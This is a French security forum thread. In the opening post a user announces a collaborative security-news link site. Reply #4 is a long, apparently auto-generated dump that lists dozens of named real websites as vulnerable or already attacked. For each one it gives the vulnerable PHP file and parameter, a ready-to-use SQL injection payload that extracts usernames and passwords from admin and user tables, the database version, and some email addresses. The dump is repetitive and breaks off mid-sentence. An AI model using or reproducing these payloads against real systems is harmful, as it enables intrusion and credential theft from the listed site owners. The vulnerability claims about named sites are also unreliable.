Annonce

Réduire
Aucune annonce.

Site de Veille Sécu collaborative

Réduire
X
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Site de Veille Sécu collaborative

    Bonjour à tous,
    Bien que je ne sois pas très actif sur le forum, je suis la communauté de tant en temps.

    Aujourd'hui je viens vous parlez d'un service que j'ai mis en place dans le cadre de mon boulot.
    En utilisant des outils open source, j'ai mis en place et maintien un site de veille sécu collaborative inspiré de lobste.rs.
    L'idée est simple, partager les liens et articles intéressants trouvés durant ma veille. Il y a également un système de vote permettant de "nettoyer" les liens de mauvaises qualités et mettre en avant les bonnes ressources.

    Trop souvent, les pros n'ont pas le temps de faire de la veille sécu car il y a toujours autre chose à faire.
    Pour les étudiants et les débutants, le problème principal est de trouver dans la masse les sources d'information fiables et intéressantes.

    Avec InfoSec ( je ne me suis pas foulé pour le nom ) j'espère répondre à ces problèmes.
    De plus, je trouve qu'une initiative de ce genre avec des liens français ( au moins en partie) manquait.
    Le tout est disponible pour tous, de façon complètement gratuite, les posts sont modérés par moi a posteriori.
    Les liens sont également partagés sur le compte twitter de ma société (@torii-security)

    Je précise afin d'être transparent que le site est hébergé par ma société, ce qui à mon sens ne change rien à la démarche si ce n'est le logo afficher.

    Le système est encore en beta et certaines fonctionnalités sont désactivées, mais il évoluera avec le temps.

    Si vous souhaitez jeter un œil, créer un compte ou juste me faire un commentaire, n'hésitez pas.

    @+
    Dernière modification par Jackall, 13 juillet 2017, 16h34.
    Jackall
    Wiki Perso: Jackall IT Wiki - Site Pro: https://www.torii-security.fr
    Twitter : @IT_Jackall

  • #2
    Bonjour Jackall,

    bravo pour ton investissement car ton site est bien fait.
    Est-il possible que tu partage certaines de tes connaissances?

    Bonne soirée

    Commentaire


    • #3
      Bonjour diuxafan,
      Merci!! ça fait plaisir d'avoir des retours.!!
      Pour le site, je ne fais que partager le fruit de ma veille grâce à un outils OpenSource (un peu modifié).
      Donc rien d'extraordinaire .
      Pour partager, je n'ai aucun souci avec ça, à part le manque de temps, mais on en est tous là .
      Jackall
      Wiki Perso: Jackall IT Wiki - Site Pro: https://www.torii-security.fr
      Twitter : @IT_Jackall

      Commentaire


      • #4
        Slt moi je fais ca avec des maths et kelke recherche sur le web si ca donne des idées ! don't forget : don't be evil ! lool Pour le fichier events_detail.php et la variable ?id= le site web www.cpr.cuhk.edu.hk est le plus en cause. Pour le fichier events_detail.php et la variable ?id= le site web qui corresponds le plus au modele est www.asiawealth.co.th. Pour le fichier events_detail.php et la variable ?id= l'hebergement le plus en cause est th. Pour le fichier events_detail.php et la variable ?id= la date la plus en cause est le 01/07/17. Pour le fichier events_detail.php et la variable ?id= la date de publication la plus en cause est le 29/01/14. Pour le fichier events_detail.php et la variable ?id= le code le plus en cause est -3342+union+select+1%2C2%2C3%2Cgroup_concat%28username%2C0x3a%2Cuser_password%29%2C5%2C6%2C7%2C8%2C9+ from+phdeb_users--+. Pour le fichier events_detail.php et la variable ?id= le site web www.cpr.cuhk.edu.hk a differents fichiers possiblement vulnerable. Pour le fichier newsitem.php et la variable ?id= le site web www.cordoganclark.com est vulnerable. Pour le fichier newsitem.php et la variable ?id= le site web www.tidytowns.ie est le plus en cause. Pour le fichier newsitem.php et la variable ?id= le site web qui corresponds le plus au modele est www.bgpijace.co.rs. Pour le fichier newsitem.php et la variable ?id= l'hebergement le plus en cause est uk. Pour le fichier newsitem.php et la variable ?id= la date la plus en cause est le 01/07/17. Pour le fichier newsitem.php et la variable ?id= la date de publication la plus en cause est le 23/08/12. Pour le fichier newsitem.php et la variable ?id= le code le plus en cause est -13%20union%20select%201,group_concat(username,0x3a,pass),3,4,5+from+users--. Pour le fichier newsitem.php et la variable ?id= le code qui corresponds le plus au modele est -8+union+select+1,2,3,group_concat(username,0x3a,password),5,6+from+cordoganclarknew.auth_user_md5--. Pour le fichier newsitem.php et la variable ?id= la version la plus en cause est 5.1.73. Pour le fichier newsitem.php et la variable ?id= le site web www.cordoganclark.com est deja attaque. Pour le fichier newsitem.php et la variable ?id= le site web www.tidytowns.ie est vulnerable. Pour le fichier newsitem.php et la variable ?id= le site web www.tidytowns.ie est deja attaque. Pour le fichier newsitem.php et la variable ?id= le site web www.weekendofjazz.com est vulnerable. Pour le fichier news.php et la variable ?y= le site web www.happich.de est le plus en cause. Pour le fichier news.php et la variable ?y= le site web qui corresponds le plus au modele est www.daht.org.uk. Pour le fichier news.php et la variable ?y= l'hebergement le plus en cause est com. Pour le fichier news.php et la variable ?y= la date la plus en cause est le 01/07/17. Pour le fichier news.php et la variable ?y= la date de publication la plus en cause est le 13/12/13. Pour le fichier detalle.php et la variable ?id= le site web www.trabajoyambiente.com.ar est le plus en cause. Pour le fichier detalle.php et la variable ?id= le site web qui corresponds le plus au modele est www.conicet.gov.ar. Pour le fichier detalle.php et la variable ?id= l'hebergement le plus en cause est com.ar. Pour le fichier detalle.php et la variable ?id= la date la plus en cause est le 02/07/17. Pour le fichier detalle.php et la variable ?id= le code le plus en cause est 7+and+1=0+union+select+all+1,2,3,4,5,6,concat_ws(0x3A,database(),user(),version()),8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34+--+. Pour le fichier detalle.php et la variable ?id= le code qui corresponds le plus au modele est idem. Pour le fichier detalle.php et la variable ?id= la version la plus en cause est 4.1.22-log. Pour le fichier detalle.php et la variable ?id= le site web www.culturagalega.org a differents fichiers possiblement vulnerable. Pour le fichier postview.php et la variable ?singlepostview= le code le plus en cause est 512211111111111111111111111111%27%20UNION%20SELECT%201,CONCAT%28CHAR%28100,100,100%29,CHAR%2891,88,9 3%29,vErsion%28%29,CHAR%2891,88,88,93%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28%20%20limit%200,1%20--%20/*%20order%20by%20%27as. Pour le fichier postview.php et la variable ?singlepostview= la version la plus en cause est 5.6.35-cll-lve. Pour le fichier postview.php et la variable ?singlepostview= le site web www.eventskey.com est deja attaque. Pour le fichier store.php et la variable ?cat= le code le plus en cause est 1+and+1=2+union+select+1,2,group_concat(clientEmail,0x3a,clientPass),4,5,6,7+from+clients. Pour le fichier store.php et la variable ?cat= la version la plus en cause est 5.6.35. Pour le fichier store.php et la variable ?cat= le mail le plus en cause est andrew@gloderworks.com. Pour le fichier store.php et la variable ?cat= le site web tubehobby.com est deja attaque. Pour le fichier store.php et la variable ?cat= le site web www.powspider.ca est deja attaque. Pour le fichier store.php et la variable ?cat= le site web www.southfloridachamber.org est vulnerable. Pour le fichier store.php et la variable ?cat= le site web www.treasuredthreadsonline.com est deja attaque. Pour le fichier order.php et la variable ?id= le site web www.phpsugar.com est le plus en cause. Pour le fichier order.php et la variable ?id= le site web qui corresponds le plus au modele est unlockcare.co.uk. Pour le fichier order.php et la variable ?id= l'hebergement le plus en cause est be. Pour le fichier order.php et la variable ?id= la date la plus en cause est le 25/03/17. Pour le fichier order.php et la variable ?id= la date de publication la plus en cause est le 20/11/16. Pour le fichier order.php et la variable ?id= le code le plus en cause est -2+union+select+1,2,3,group_concat(user(),0x0b,version(),0x0b,database(),0x0b,@@version_compile_os,0x 0b),5,6,7,8--. Pour le fichier order.php et la variable ?id= le code qui corresponds le plus au modele est idem. Pour le fichier order.php et la variable ?id= la version la plus en cause est 5.0.51a-3ubuntu5.8. Pour le fichier order.php et la variable ?id= le site web cgit.drupalcode.org a differents fichiers possiblement vulnerable. Pour le fichier detail_event.php et la variable ?idx= le site web www.tebingtinggikota.go.id est le plus en cause. Pour le fichier detail_event.php et la variable ?idx= le site web qui corresponds le plus au modele est www.tebingtinggikota.go.id. Pour le fichier detail_event.php et la variable ?idx= l'hebergement le plus en cause est id. Pour le fichier detail_event.php et la variable ?idx= la date la plus en cause est le 21/05/17. Pour le fichier detail_event.php et la variable ?idx= la date de publication la plus en cause est le 18/03/14. Pour le fichier detail_event.php et la variable ?idx= le code le plus en cause est 262+and+false+UnIOn+distinctrow%2F**_**%2Fselect+0x312920686176696e672066616c736520554e494f4e2053454 c454354203078333132303631366536343230363636313663373336353230353536653439366636653230373336353463363 5343337343230333133313331333133313331333132633664363136623635356637333635373432383336326334303361336 4333037383330363132633238373336353663363536333734323833313239363637323666366432383639366536363666373 2366436313734363936663665356637333633363836353664363132653633366636633735366436653733323937373638363 5373236353430336133643664363136623635356637333635373432383335333133313263343032633330373833333633333 6363333363339333336353263373436313632366336353566366536313664363532633633366636633735366436653566366 53631366436353239323932633430323932332c3223%2Cconcat(version()%2C0x3a3a3a204861766f43%2C0x3c62723e%2 Cdatabase%2F**_**%2F()%2C0x3c62723e%2Cuser())%2C3%2C4%2C5%2C6%23. Pour le fichier detail_event.php et la variable ?idx= le code qui corresponds le plus au modele est idem. Pour le fichier detail_event.php et la variable ?idx= la version la plus en cause est 5.5.50-cll. Pour le fichier detail_event.php et la variable ?idx= le site web www.tebingtinggikota.go.id est deja attaque. Pour le fichier images.php et la variable ?show=all&id= le site web www.tatahousing.in est le plus en cause. Pour le fichier images.php et la variable ?show=all&id= le site web qui corresponds le plus au modele est www.tatahousing.in. Pour le fichier images.php et la variable ?show=all&id= l'hebergement le plus en cause est in. Pour le fichier images.php et la variable ?show=all&id= la date la plus en cause est le 25/03/17. Pour le fichier images.php et la variable ?show=all&id= le site web www.tatahousing.in est deja attaque. Pour le fichier product-detail.php et la variable ?PID= le site web www.mission.co.uk est le plus en cause. Pour le fichier product-detail.php et la variable ?PID= le site web qui corresponds le plus au modele est me-in.co.kr. Pour le fichier product-detail.php et la variable ?PID= l'hebergement le plus en cause est com. Pour le fichier product-detail.php et la variable ?PID= la date la plus en cause est le 30/06/17. Pour le fichier product-detail.php et la variable ?PID= la date de publication la plus en cause est le 23/08/16. Pour le fichier product-detail.php et la variable ?PID= le code le plus en cause est 56+and+%40x%3A%3DConcat(0x3c2f7363726970743e%2C0x616469747961203a3a20%2Cversion()%2C0x3c62723e446174 6162617365203a3a20%2C%2F*!database*%2F()%2C0x3c62723e55736572203a3a20%2C%2F*!user*%2F()%2C0x3c62723e 3c62723e%2C(Select(%40x)From(Select(%40x%3A%3D0x00)%2C(%40nr%3A%3D0)%2C(Select(0)From%2F*!50000infor mation_schema.columns*%2F+Where(table_schema!%3D0x696e666f726d6174696f6e5f736368656d61)And(0x00)in(% 40x%3A%3DConcat(%40x%2C0x3c666f6e7420636f6c6f723d7265643e%2Clpad(%40nr%3A%3D%40nr%2B1%2C3%2C0x30)%2C 0x3c2f666f6e743e3c666f6e7420636f6c6f723d626c75653e20%2C%2F*!50000table_name*%2F%2C0x3c2f666f6e743e3c 666f6e7420636f6c6f723d677265656e3e20%2C%2F*!50000column_name*%2F%2C0x3c2f666f6e743e3c62723e))))x)%2C 0x3c212d2d)%2F*!union*%2F+select+1%2C2%2C%40x%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11+--+. Pour le fichier product-detail.php et la variable ?PID= le code qui corresponds le plus au modele est idem. Pour le fichier product-detail.php et la variable ?PID= le site web www.audiolab.co.uk a differents fichiers possiblement vulnerable. Pour le fichier product-detail.php et la variable ?PID= la version la plus en cause est 5.5.39-36.0-log. Pour le fichier product-detail.php et la variable ?PID= le site web www.quad-hifi.co.uk a differents fichiers possiblement vulnerable. Pour le fichier product-detail.php et la variable ?PID= le site web www.mission.co.uk a differents fichiers possiblement vulnerable. Pour le fichier view.php et la variable ?id= le site web moodle.org est le plus en cause. Pour le fichier view.php et la variable ?id= le site web qui corresponds le plus au modele est cursus.univ-rennes2.fr. Pour le fichier view.php et la variable ?id= l'hebergement le plus en cause est fr. Pour le fichier view.php et la variable ?id= la date la plus en cause est le 05/12/16. Pour le fichier view.php et la variable ?id= la date de publication la plus en cause est le 26/05/16. Pour le fichier view.php et la variable ?id= le code le plus en cause est -8+union+select+1,version(),database(),4,5,6,7,8--. Pour le fichier view.php et la variable ?id= le code qui corresponds le plus au modele est idem. Pour le fichier view.php et la variable ?id= la version la plus en cause est 4.1.22-standard-log. Pour le fichier view.php et la variable ?id= le mail le plus en cause est maaxi@hotmail.com. Pour le fichier view.php et la variable ?id= le site web moodle.org est vulnerable. Pour le fichier view.php et la variable ?id= le site web moodle.org a differents fichiers possiblement vulnerable. Pour le fichier index.php et la variable ?page= le site web www7.mels.gouv.qc.ca est le plus en cause. Pour le fichier index.php et la variable ?page= le site web qui corresponds le plus au modele est www.sedgwickmuseum.org. Pour le fichier index.php et la variable ?page= l'hebergement le plus en cause est com. Pour le fichier index.php et la variable ?page= la date la plus en cause est le 21/05/17. Pour le fichier index.php et la variable ?page= le code le plus en cause est -12+union+select+1,password,3+from+users. Pour le fichier index.php et la variable ?page= la version la plus en cause est 5.1.72-cll-lve. Pour le fichier order.php et la variable ?id= le site web www.lowther-holidaypark.co.uk est deja attaque. Pour le fichier product.php et la variable ?cid= le site web www.huggamind.com est le plus en cause. Pour le fichier product.php et la variable ?cid= le site web qui corresponds le plus au modele est www.dreamcenter-fl.org. Pour le fichier product.php et la variable ?cid= l'hebergement le plus en cause est com. Pour le fichier product.php et la variable ?cid= la date la plus en cause est le 21/05/17. Pour le fichier product.php et la variable ?cid= le code le plus en cause est .63%20+UNION+ALL+SELECT+1,concat(0x3c696d67207372633d22687474703a2f2f6936362e74696e797069632e636f6d2 f326c63746465662e706e67222077696474683d223330307078223e3c62723e3c68313e496e6a65637465642062793a20543 07821633c2f68313e557365723a3a,user(),0x3c42723e,version(),0x3c42723e,database(),concat(@c:=0x00,if(( select%20count(*)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20@c:= concat(@c,0x3c62723e,table_name,column_name)),0x00,0x00),@c)),3,4,5,6,7,8--. Pour le fichier product.php et la variable ?cid= la version la plus en cause est 5.5.43-37.2-log. Pour le fichier product.php et la variable ?cid= le site web www.mission.co.uk a differents fichiers possiblement vulnerable. Pour le fichier product.php et la variable ?cid= le site web www.quad-hifi.co.uk a differents fichiers possiblement vulnerable. Pour le fichier product.php et la variable ?cid= le site web www.hexonline.co.uk est deja attaque. Pour le fichier product.php et la variable ?cid= le site web www.audiolab.co.uk a differents fichiers possiblement vulnerable. Pour le fichier product.php et la variable ?cid= le site web www.wellydiecast.com est vulnerable. Pour le fichier read.php et la variable ?id= le site web newsandviews24.com est vulnerable. Pour le fichier read.php et la variable ?id= le site web www.sourceisrael.com est le plus en cause. Pour le fichier read.php et la variable ?id= le site web qui corresponds le plus au modele est szamitogep.hu. Pour le fichier read.php et la variable ?id= l'hebergement le plus en cause est net. Pour le fichier read.php et la variable ?id= la date la plus en cause est le 10/02/14. Pour le fichier read.php et la variable ?id= la date de publication la plus en cause est le 02/04/13. Pour le fichier read.php et la variable ?id= le code le plus en cause est -3+union+select+1,2,3,4,group_concat(username,0x3a,pass),6,7,8,9,10,11+from+members--. Pour le fichier read.php et la variable ?id= le code qui corresponds le plus au modele est idem. Pour le fichier read.php et la variable ?id= la version la plus en cause est 5.5.42-cll. Pour le fichier read.php et la variable ?id= le mail le plus en cause est redaction@sourceisrael.com. Pour le fichier read.php et la variable ?id= le site web btourism.com est vulnerable. Pour le fichier read.php et la variable ?id= le site web www.soldatru.ru a differents fichiers possiblement vulnerable. Pour le fichier read.php et la variable ?id= le site web www.otzyv.ru a differents fichiers possiblement vulnerable. Pour le fichier view_news.php et la variable ?id= le site web www.carbonsciences.com est le plus en cause. Pour le fichier view_news.php et la variable ?id= le site web qui corresponds le plus au modele est www.dnfnepal.org. Pour le fichier view_news.php et la variable ?id= l'hebergement le plus en cause est gov.tw. Pour le fichier view_news.php et la variable ?id= la date la plus en cause est le 21/05/17. Pour le fichier view_news.php et la variable ?id= la date de publication la plus en cause est le 07/04/15. Pour le fichier view_news.php et la variable ?id= le code le plus en cause est 1+union+select+1,group_concat(id,0xa3,username,0xa3,password),3,4,5,6,7+from+admin--. Pour le fichier view_news.php et la variable ?id= la version la plus en cause est 5.6.33-cll-lve. Pour le fichier view_news.php et la variable ?id= le site web sheelahospital.in est deja attaque. Pour le fichier order.php et la variable ?id= le site web www.srigulfandhra.com est vulnerable. Pour le fichier product-detail.php et la variable ?PID= le site web www.higher.com.pk est deja attaque. Pour le fichier article.php et la variable ?id= le site web www.echoalgerie.com est le plus en cause. Pour le fichier article.php et la variable ?id= le site web qui corresponds le plus au modele est www.laisimo.com. Pour le fichier article.php et la variable ?id= l'hebergement le plus en cause est free.fr. Pour le fichier article.php et la variable ?id= la date la plus en cause est le 27/04/16. Pour le fichier article.php et la variable ?id= la date de publication la plus en cause est le 21/04/16. Pour le fichier article.php et la variable ?id= le code le plus en cause est -23+union+select+1,unhex(hex(group_concat(name,0x3e,password,0x3e,type))),3,4,5,6,7,8+from+user_login--. Pour le fichier article.php et la variable ?id= le code qui corresponds le plus au modele est idem. Pour le fichier article.php et la variable ?id= la version la plus en cause est 5.0.91-log. Pour le fichier article.php et la variable ?id= le mail le plus en cause est photosoc_satan@localhost. Pour le fichier article.php et la variable ?id= le site web www.geneticsandsociety.org est vulnerable. Pour le fichier article.php et la variable ?id= le site web www.geneticsandsociety.org est deja attaque. Pour le fichier article.php et la variable ?id= le site web touchstonemag.com est vulnerable. Pour le fichier article.php et la variable ?id= le site web www.backscatter.com a differents fichiers possiblement vulnerable. Pour le fichier article.php et la variable ?id= le site web www.tribpreps.com est vulnerable. Pour le fichier article.php et la variable ?id= le site web www.tribpreps.com a differents fichiers possiblement vulnerable. Pour le fichier images.php et la variable ?id= le site web www.tatahousing.in est le plus en cause. Pour le fichier images.php et la variable ?id= le site web qui corresponds le plus au modele est aderindia.org.in. Pour le fichier images.php et la variable ?id= l'hebergement le plus en cause est in. Pour le fichier images.php et la variable ?id= la date la plus en cause est le 28/02/17. Pour le fichier images.php et la variable ?id= le code le plus en cause est -26%20UNION%20SELECT%201,2,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_ set(511,@,0x3c6c693e,table_name,column_name)),@),concat(0x496e6a65637465642062792050482048656e657234 4c204c756e34,0x3c62723e,0x56657273696f6e3a3a3a,version(),0x3c62723e,0x557365723a3a3a,user(),0x3c6272 3e,0x44617461626173653a3a3a,database()),5,6,7,8,9,10,11,12--%20-. Pour le fichier images.php et la variable ?id= la version la plus en cause est 5.5.54-cll. Pour le fichier images.php et la variable ?id= le site web www.tatahousing.in est deja attaque. Pour le fichier images.php et la variable ?id= le site web jltv.tv a differents fichiers possiblement vulnerable. Pour le fichier images.php et la variable ?id= le site web jltv.tv est deja attaque. Pour le fichier ldetails.php et la variable ?nId= le site web ibapu.edu.pk est le plus en cause. Pour le fichier ldetails.php et la variable ?nId= le site web qui corresponds le plus au modele est ibapu.edu.pk. Pour le fichier ldetails.php et la variable ?nId= l'hebergement le plus en cause est edu.pk. Pour le fichier ldetails.php et la variable ?nId= la date la plus en cause est le 28/02/17. Pour le fichier ldetails.php et la variable ?nId= le code le plus en cause est -7%20+UNION+ALL+SELECT+1,@@version,(SELECT(@x)FROM(SELECT(@x:=0x00)%20,(SELECT(@x)FROM(%20ibapued_iba pu.administrator)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x3a,userpassword,0x3c62723e))))x),4,5,6,7, 8,9--+. Pour le fichier ldetails.php et la variable ?nId= le code qui corresponds le plus au modele est -7%20+UNION+ALL+SELECT+1,@@version,(SELECT(@x)FROM(SELECT(@x:=0x00)%20,(SELECT(@x)FROM(%20ibapued_iba pu.administrator)WHERE(@x)IN(@x:=CONCAT(0x20,@x,username,0x3a,userpassword,0x3a,useremail,0x3c62723e ))))x),4,5,6,7,8,9--+. Pour le fichier ldetails.php et la variable ?nId= la version la plus en cause est 5.5.41-cll-lve. Pour le fichier ldetails.php et la variable ?nId= le mail le plus en cause est shahidmunir49@ibapu.com. Pour le fichier ldetails.php et la variable ?nId= le site web ibapu.edu.pk est deja attaque. Pour le fichier mod.php et la variable ?mod= le site web www.albasrah.net est le plus en cause. Pour le fichier mod.php et la variable ?mod= le site web qui corresponds le plus au modele est pn-padang.go.id. Pour le fichier mod.php et la variable ?mod= l'hebergement le plus en cause est com. Pour le fichier mod.php et la variable ?mod= la date la plus en cause est le 28/02/17. Pour le fichier mod.php et la variable ?mod= la date de publication la plus en cause est le 09/12/06. Pour le fichier mod.php et la variable ?mod= le site web bulutangkis.com est deja attaque. Pour le fichier newsitempage.php et la variable ?id= le site web www.prop2000.co.za est le plus en cause. Pour le fichier newsitempage.php et la variable ?id= le site web qui corresponds le plus au modele est www.prop2000.co.za. Pour le fichier newsitempage.php et la variable ?id= l'hebergement le plus en cause est za. Pour le fichier newsitempage.php et la variable ?id= la date la plus en cause est le 30/06/16. Pour le fichier newsitempage.php et la variable ?id= la date de publication la plus en cause est le 09/07/07. Pour le fichier newsitempage.php et la variable ?id= le code le plus en cause est -49+union+select+0,concat(database(),0x3a,version()),2,3,4,5,6,7,8,9,10--. Pour le fichier newsitempage.php et la variable ?id= le code qui corresponds le plus au modele est idem. Pour le fichier newsitempage.php et la variable ?id= la version la plus en cause est 5.1.66-0+squeeze1. Pour le fichier newsitempage.php et la variable ?id= le site web www.prop2000.co.za est deja attaque. Pour le fichier news.php et la variable ?id= le site web www.earthfiles.com est le plus en cause. Pour le fichier news.php et la variable ?id= le site web qui corresponds le plus au modele est www.eaci.net. Pour le fichier news.php et la variable ?id= l'hebergement le plus en cause est com. Pour le fichier news.php et la variable ?id= la date la plus en cause est le 28/02/17. Pour le fichier news.php et la variable ?id= la date de publication la plus en cause est le 13/05/13. Pour le fichier news.php et la variable ?id= le code le plus en cause est -130%20union%20select%20all%201,group_concat(username,0x3a,password),3,4,5,6%20from%20tar_admin--. Pour le fichier news.php et la variable ?id= le code qui corresponds le plus au modele est 7+and+1=0+union+select+1,concat_ws(0x3a,id,username,password),3,4,5+from+users--. Pour le fichier news.php et la variable ?id= la version la plus en cause est 5.5.42-cll. Pour le fichier news.php et la variable ?id= le mail le plus en cause est senators@nass.gov.ng. Pour le fichier news.php et la variable ?id= le site web www.nhlegendsofhockey.com est vulnerable. Pour le fichier news.php et la variable ?id= le site web www.nhlegendsofhockey.com est deja attaque. Pour le fichier news.php et la variable ?id= le site web www.dublinsquarepub.com est vulnerable. Pour le fichier news.php et la variable ?id= le site web northeastnews.in est vulnerable. Pour le fichier news.php et la variable ?id= le site web bestindustrygroup.com est vulnerable. Pour le fichier news.php et la variable ?id= le site web www.smash-uk.com est deja attaque. Pour le fichier news.php et la variable ?id_new= le site web www.arc-cre.com est le plus en cause. Pour le fichier news.php et la variable ?id_new= le site web qui corresponds le plus au modele est www.meccanica2p.it. Pour le fichier news.php et la variable ?id_new= l'hebergement le plus en cause est com. Pour le fichier news.php et la variable ?id_new= la date la plus en cause est le 28/02/17. Pour le fichier news.php et la variable ?id_new= la date de publication la plus en cause est le 08/11/10. Pour le fichier news.php et la variable ?id_new= le code le plus en cause est 22+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),7,8,9. Pour le fichier news.php et la variable ?id_new= le code qui corresponds le plus au modele est idem. Pour le fichier news.php et la variable ?id_new= la version la plus en cause est 5.5.40-0+wheezy1-log. Pour le fichier news.php et la variable ?id_new= le site web sizampskov.ru est deja attaque. Pour le fichier recording.php et la variable ?id= le site web www.sumtone.com est le plus en cause. Pour le fichier recording.php et la variable ?id= le site web qui corresponds le plus au modele est thefixturestore.ca. Pour le fichier recording.php et la variable ?id= l'hebergement le plus en cause est ca. Pour le fichier recording.php et la variable ?id= la date la plus en cause est le 28/02/17. Pour le fichier recording.php et la variable ?id= la date de publication la plus en cause est le 24/12/09. Pour le fichier recording.php et la variable ?id= le code le plus en cause est -11+UNION+SELECT+CONCAT(0x6d7964756d703135,USER(),0x3a,VERSION(),0x3a,DATABASE(),0x6d7964756d703135)--. Pour le fichier recording.php et la variable ?id= le code qui corresponds le plus au modele est idem. Pour le fichier recording.php et la variable ?id= la version la plus en cause est 5.5.49-0ubuntu0.14.04.1. Pour le fichier recording.php et la variable ?id= le site web cholianglin.com est deja attaque. Pour le fichier recording.php et la variable ?id= le site web drupalcode.org a differents fichiers possiblement vulnerable. Pour le fichier repuestos.php et la variable ?grupo= le site web nevicorsac.com est le plus en cause. Pour le fichier repuestos.php et la variable ?grupo= le site web qui corresponds le plus au modele est www.cochedeimportacion.es. Pour le fichier repuestos.php et la variable ?grupo= l'hebergement le plus en cause est com. Pour le fichier repuestos.php et la variable ?grupo= la date la plus en cause est le 28/02/17. Pour le fichier repuestos.php et la variable ?grupo= le code le plus en cause est LL%27%20and%205=6%20union%20select%201,concat(0x5E252421,version(),0x2A5B7D2F),3,4,5,6,7,8,9,10%20--%20And%20%276%27=%276. Pour le fichier repuestos.php et la variable ?grupo= la version la plus en cause est 5.5.52-0+deb7u1-log. Pour le fichier repuestos.php et la variable ?grupo= le site web cochedeimportacion.es est deja attaque. Pour le fichier subcategoria.php et la variable ?categoria= le site web www.assennjufe.org.br est le plus en cause. Pour le fichier subcategoria.php et la variable ?categoria= le site web qui corresponds le plus au modele est www.habitainmobiliaria.com. Pour le fichier subcategoria.php et la variable ?categoria= l'hebergement le plus en cause est com.mx. Pour le fichier subcategoria.php et la variable ?categoria= la date la plus en cause est le 28/02/17. Pour le fichier subcategoria.php et la variable ?categoria= la date de publication la plus en cause est le 17/02/17. Pour le fichier subcategoria.php et la variable ?categoria= le code le plus en cause est -5+union+select+1,2,version(),4,5,6--. Pour le fichier subcategoria.php et la variable ?categoria= la version la plus en cause est 5.5.54-0ubuntu0.14.04.1. Pour le fichier subcategoria.php et la variable ?categoria= le site web cabrainformacion.com a differents fichiers possiblement vulnerable. Pour le fichier subcategoria.php et la variable ?categoria= le site web priegodigital.com a differents fichiers possiblement vulnerable. Pour le fichier subcategoria.php et la variable ?categoria= le site web www.exoticasflores.cl est deja attaque. Pour le fichier view.php et la variable ?id= le site web eastcoasttrail.ca est vulnerable. Pour le fichier calendar_details.php et la variable ?id= le site web www.awb.org est le plus en cause. Pour le fichier calendar_details.php et la variable ?id= le site web qui corresponds le plus au modele est www.fellowshipchristiancenter.org. Pour le fichier calendar_details.php et la variable ?id= l'hebergement le plus en cause est edu.au. Pour le fichier calendar_details.php et la variable ?id= la date la plus en cause est le 31/01/17. Pour le fichier calendar_details.php et la variable ?id= la date de publication la plus en cause est le 17/01/17. Pour le fichier detail.php et la variable ?headline= le site web concept-group.com est le plus en cause. Pour le fichier detail.php et la variable ?headline= le site web qui corresponds le plus au modele est archive.is. Pour le fichier detail.php et la variable ?headline= l'hebergement le plus en cause est com. Pour le fichier detail.php et la variable ?headline= la date la plus en cause est le 04/09/16. Pour le fichier detail.php et la variable ?headline= la date de publication la plus en cause est le 01/10/15. Pour le fichier detail.php et la variable ?headline= le site web archive.is a differents fichiers possiblement vulnerable. Pour le fichier download.asp et la variable ?ID= le site web www.imperva.com est le plus en cause. Pour le fichier download.asp et la variable ?ID= le site web qui corresponds le plus au modele est metod.dvpion.ru. Pour le fichier download.asp et la variable ?ID= l'hebergement le plus en cause est org.br. Pour le fichier download.asp et la variable ?ID= la date la plus en cause est le 31/01/17. Pour le fichier download.asp et la variable ?ID= la date de publication la plus en cause est le 25/09/16. Pour le fichier download.asp et la variable ?ID= le code le plus en cause est -330%20/*!UNION%20SELECT*/%201,2,3,/*!(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x6 96e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_nam e,0x3a,column_name))))x),5,6,7*/. Pour le fichier download.asp et la variable ?ID= la version la plus en cause est 5.5.40-cll. Pour le fichier exhibitions.php et la variable ?id= le site web www.dtrmodern.com est le plus en cause. Pour le fichier exhibitions.php et la variable ?id= le site web qui corresponds le plus au modele est www.antjehanebeck.de. Pour le fichier exhibitions.php et la variable ?id= l'hebergement le plus en cause est uk. Pour le fichier exhibitions.php et la variable ?id= la date la plus en cause est le 03/12/16. Pour le fichier exhibitions.php et la variable ?id= la date de publication la plus en cause est le 15/02/07. Pour le fichier exhibitions.php et la variable ?id= le code le plus en cause est -1+union+select+1,0x4841434b454420425920205461336c61622d656c2d6d616b61723e3e78303540686f746d61696c2e6 974203e3e3e446961626c6f2d30373e3e20782e6340686f746d61696c2e69743e3e2e2e2e4d6f726f4363616e2049734c616 d20446566656e64657273205465616d2e2e2e,3,4,@@version,6,7--. Pour le fichier exhibitions.php et la variable ?id= le code qui corresponds le plus au modele est idem. Pour le fichier exhibitions.php et la variable ?id= la version la plus en cause est 5.5.32-log. Pour le fichier exhibitions.php et la variable ?id= le site web www.monteclarkgallery.com est vulnerable. Pour le fichier exhibitions.php et la variable ?id= le site web neworleansphotoalliance.org a differents fichiers possiblement vulnerable. Pour le fichier exhibitions.php et la variable ?id= le site web www.dtrmodern.com est deja attaque. Pour le fichier exhibitions.php et la variable ?id= le site web www.innotool-austria.com a differents fichiers possiblement vulnerable. Pour le fichier item.php et la variable ?itemid= le site web www.frxoops.org est le plus en cause. Pour le fichier item.php et la variable ?itemid= le site web qui corresponds le plus au modele est www.itabashishakyo.jp. Pour le fichier item.php et la variable ?itemid= l'hebergement le plus en cause est com. Pour le fichier item.php et la variable ?itemid= la date la plus en cause est le 31/01/17. Pour le fichier item.php et la variable ?itemid= la date de publication la plus en cause est le 02/07/12. Pour le fichier item.php et la variable ?itemid= le code le plus en cause est 1+AND+1=2+UNION+SELECT+1,2,3,concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20),conca t(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20),concat(0x1e,0x1e,version(),0x1e,user(), 0x1e,database(),0x1e,0x20),7--. Pour le fichier item.php et la variable ?itemid= le code qui corresponds le plus au modele est idem. Pour le fichier 